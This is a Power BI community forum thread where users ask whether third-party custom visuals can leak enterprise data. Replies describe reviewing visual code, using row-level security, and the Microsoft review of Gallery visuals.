Skip to main content
cancel
Showing results for 
Search instead for 
Did you mean: 

Earn a 50% discount on the DP-600 certification exam by completing the Fabric 30 Days to Learn It challenge.

Reply
AlexNYExcel
Frequent Visitor

contain security or privacy

How safe is custom visuals?

 

When I try to upload new custom visuals, some of them really great - there is such prompt:

Custom Visuals are not provided by Microsoft and could contain security or privacy risks. Only import this custom visual if you trust its author and source.

 

I would like to raise some questions:

Does Custom visuals be reason for data leakage?

Could microsoft allow such a loophole in Business Intelligence software for Enteprise?

 

If you would like to answer - no, what the point in this warning?

Looking for response in order to utilize Power BI at 100%.

 

Thank you.

9 REPLIES 9
slern
Regular Visitor

Hello,


I work for an agency and we are considering using Power BI and the custom visuals **ONLY from the Power BI Custom Visuals Gallery** for our reporting needs. That said, we need an official Microsoft response to be able to move forward. We are mainly concerned with our data being able to be leaked by using/importing a custom visual from the gallery.

Thank you for your time and consideration of this question.

Anonymous
Not applicable

If you are worried about leaks in the Custom Visuals, you will first need to figure out what sort of leak you are concerned with.

Are you worred about:

  1. Backdoors and leaks within the Custom Visual Code
  2. Reports storing identifable data that a user could export and use.
  3. Unauthorized users running reports or dashboards they aren't supposed to.
  4. Some other leak i've not listed.

 

I would suggest for each:

  1. You can inspect the code yourself for each visual you download.  PBIVIZ files can be opened by 7-Zip and the code is all held in essentially Text Files.  You may need someone with Typescript or Javascript experience to aid you.
  2. Depending on how you write your reports, this may or may not be an issue
  3. If you use Row Level Security, you can lock out data from certain users and prevent non-authorized users from seeing anything.
  4. Post the scenario you are concerned with.
djnww
Impactful Individual
Impactful Individual

Can someone from the Power BI team provide a definitive response to the original question posted by @AlexNYExcel ?

 

I understand the reasons for the warning as any Mr Smith can create and upload malicious custom visuals into Power BI.

 

However, are the custom visuals in the official Power BI Visuals Gallery completely safe as they have been approved by Microsoft ? My company has 8000 staff and we are rolling out Power BI across most departments. If Power BI cannot confirm that the official POwer BI Visuals gallery is safe, then we have a problem as private data may be leaked or that it may contain a virus.

 

Again, I would just like clarification over the safety of using the approved custom visuals found on the official Microsoft Power BI Visuals Gallery.

 

Cheers,

Daniel

 

 

Daniel, 

 

Did you ever get a response back on this? Are custom visuals on the official Power BI Visuals Gallery safe and approved by Microsoft?

This is an old topic but I am interested to know as well.

Anonymous
Not applicable

Can anybody tell ,is there any security risks for using custom visuals available in powerbi visuals gallery

The custom visuals in the Visuals Gallery are reviewed by Microsoft prior to being published. With Javascript, it is possible to do pretty much anything, so the warning and review process are there for good reason.

 

For example, it's possible to create malicious visuals that can alter other charts or send private data elsewhere. That's not unique to Power BI--it's possible in general for web development. Something like this "donut eater" that replaces the donuts from other charts would never be approved for the Gallery, but anyone could package something like this independently as a .pbiviz file and distribute it outside of the Gallery. Replacing an image is kind of a fun example, but what if it subtly changed *values* in those charts--or worse? I would heed the warning and, in my opinion, only use visuals from the Gallery or ones that have been otherwise verified to not contain dangerous code.

So, you say that Galley on web Powerbi.com has nice visualization that approved by microsoft and does not have security risks.

Any vis from any other source could be dangerous?

Yes. It's likely that any visual that is distributed outside of the Gallery will *not* be dangerous--but there is always that risk.

Helpful resources

Announcements
RTI Forums Carousel3

New forum boards available in Real-Time Intelligence.

Ask questions in Eventhouse and KQL, Eventstream, and Reflex.

MayPowerBICarousel

Fabric Monthly Update - May 2024

Check out the May 2024 Fabric update to learn about new features.

LearnSurvey

Fabric certifications survey

Certification feedback opportunity for the community.

Top Solution Authors